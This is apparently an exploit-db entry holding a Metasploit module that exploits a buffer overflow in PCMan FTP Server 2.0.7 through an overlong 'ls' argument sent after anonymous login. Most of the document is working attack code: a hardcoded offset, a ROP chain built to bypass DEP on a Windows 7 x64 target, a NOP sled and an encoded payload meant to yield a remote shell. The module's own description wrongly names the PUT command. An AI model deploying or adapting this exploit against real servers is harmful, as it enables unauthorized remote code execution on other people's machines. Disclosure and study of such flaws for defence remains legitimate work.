# Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
# Exploit Author: quanyechavshuo
# Contact: quanyechavshuo@gmail.com
# Website: http://xinghuacai.github.io
# Category: ftp remote exploit
1. Description
this is another bug of pcmanftp which can be used to get a remote shell,and fits well with win7x64 with dep open,refer from
https://www.exploit-db.com/exploits/39662/
use anonymous and any password to login the ftp remotely,then send a command "ls AAA...A"(9000),the pcmanftp will crashed,later,find the 2009-2012th "A" will replace the pcmanftp's retn address
=end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Ftp
def initialize(info = {})
super(update_info(info,
'Name' => 'PCMAN FTP Server Buffer Overflow - ls Command',
'Description' => %q{
This module exploits a buffer overflow vulnerability found in the PUT command of the
PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous
credientials are enabled.
},
'Author' =>
[
'quanyechavshuo'
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'EDB', '39662'],
[ 'OSVDB', 'N/A']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process'
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x0A\x0D",
},
'Platform' => 'win',
'Targets' =>
[
[ 'windows 7 x64 chinese',
{
#'Ret' => 0x77636aeb, #dont need ret here in win7
'Offset' => 2008
}
],
],
'DisclosureDate' => 'Aug 07 2015',
'DefaultTarget' => 0))
end
def check
connect_login
disconnect
if /220 PCMan's FTP Server 2\.0/ === banner
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
end
def create_rop_chain()
# rop chain generated with mona.py - www.corelan.be
rop_gadgets =
[
0x77032c3b, # POP EAX # RETN [kernel32.dll]
0x41414141, # add a 4 bytes data to fit retn 0x4 from the last function's retn before eip=rop_gadgets
0x73c112d0, # ptr to &VirtualProtect() [IAT OLEACC.dll]
0x76bb4412, # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSCTF.dll]
0x76408d2a, # XCHG EAX,ESI # RETN [SHLWAPI.dll]
0x76b607f0, # POP EBP # RETN [msvcrt.dll]
0x74916f14, # & push esp # ret [RICHED20.dll]
0x7368b031, # POP EAX # RETN [COMCTL32.dll]
0xfffffaff, # Value to negate, will become 0x00000201
0x756c9a5c, # NEG EAX # RETN [SHELL32.dll]
0x767088bd, # XCHG EAX,EBX # RETN [RPCRT4.dll]
0x77031d7b, # POP EAX # RETN [kernel32.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x76cc4402, # NEG EAX # RETN [SHELL32.dll]
0x76b4ad98, # XCHG EAX,EDX # RETN [SHELL32.dll]
0x756b1cc1, # POP ECX # RETN [SHELL32.dll]
0x7647c663, # &Writable location [USP10.dll]
0x73756cf3, # POP EDI # RETN [COMCTL32.dll]
0x76cc4404, # RETN (ROP NOP) [USER32.dll]
0x76b3f5d4, # POP EAX # RETN [msvcrt.dll]
0x90909090, # nop
0x7366e16f, # PUSHAD # RETN [COMCTL32.dll]
].flatten.pack("V*")
return rop_gadgets
end
def exploit
connect_login
print_status('Generating payload...')
sploit = rand_text_alpha(target['Offset'])
#tmp = sploit
#print_status(tmp)
sploit << create_rop_chain()
#sploit << make_nops(9) 这句产生的nop并非90
sploit << "\x90"*30
#sploit << "\x41"*30
#sploit << "\xcc"
sploit << payload.encoded
#tmp=sploit
tmp=make_nops(9)
print_status(tmp)
send_cmd( ["ls", sploit], false )
disconnect
end
end